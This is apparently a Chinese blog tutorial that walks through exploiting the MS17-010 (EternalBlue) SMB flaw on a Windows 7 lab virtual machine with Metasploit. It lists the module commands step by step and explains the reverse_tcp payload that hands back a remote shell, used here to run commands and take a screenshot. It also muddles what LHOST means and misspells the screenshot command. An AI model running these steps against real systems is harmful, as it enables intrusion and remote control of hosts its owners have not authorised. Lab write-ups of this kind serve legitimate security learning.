MSF实战——ms17-010漏洞的危害

今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF实战渗透测试win7主机。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、MS17-010漏洞简介

2017年4月14日,黑客团体Shadow Brokers公布了一大批网络攻击工具,其中就包括“永恒之蓝”工具,该工具利用了Windows系统的SMB漏洞,从而可以获取系统的最高权限。当年5月12日,其他黑客利用“永恒之蓝”漏洞,制作了wannacry的勒索病毒,全球范围内多个企业、高校内网纷纷中招。
永恒之蓝漏洞,在MSF中对应的就是编号MS17-010的漏洞利用模块。

二、MSF模块选择与使用

首先,我们先选择MSF的模块,执行命令:

search name:ms17-010

结果如下所示:
在这里插入图片描述
在这里,我们选择上图中的第0个模块,执行命令:

use exploit/windows/smb/ms17_010_eternalblue

在模块选择后,我们执行命令:

show options

可以查看该攻击模块的参数,结果如下所示:
在这里插入图片描述
从上图可以看出,当前我们的攻击参数大多数已经设定,我们需要自己设定的就是RHOSTS,执行命令:

set RHOSTS 192.168.136.77

上述命令中RHOSTS参数表示目标主机,即要进行渗透测试的设备,我们将该参数设定为一台Windows7的Vmware虚拟机。

三、攻击载荷设置

接下来,我们还要设置攻击载荷。
我们可以简单的理解为,之前模块的作用是选择采取何种方式进行攻击渗透系统,而攻击载荷(Payload)即在渗透系统成功后要干什么。
在新版本的MSF中,当我们选择该模块时,会自动帮助我们配置好了攻击载荷,如下所示:
在这里插入图片描述
注意在上图中,我们使用了reverse_tcp的攻击载荷,这个攻击载荷在攻击成功后,会向指定设备的指定端口反馈一个TCP链接,并且允许我们在该设备上执行SHELL命令。上述Payload中的LHOST和LPORT即为目标设备的IP地址和端口号,在这里MSF帮助我们将LHOST自动设定为本机的IP地址,LPORT自动设定为4444(一个不常用的端口号)。

四、MSF执行渗透与效果查看

在完成上述配置后,我们执行命令:

run

表示执行该模块,该命令执行结果如下所示:
在这里插入图片描述
接下来,我们来测试一下MSF渗透测试的结果,我们在反弹回的SHELL中,执行命令进行测试,结果如下所示:
在这里插入图片描述
可以看到,我们能够执行windows的操作命令。
之后,我们执行命令:

screenstot

该命令可以使得我们获取当前屏幕状态,并保存为一张图片,该命令执行结果如下所示:
在这里插入图片描述
从上图可知,目标主机的屏幕截图保存在了/root/下,我们打开该图片,结果如下所示:
在这里插入图片描述
以上,便充分说明了MS17-010漏洞的危害!
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值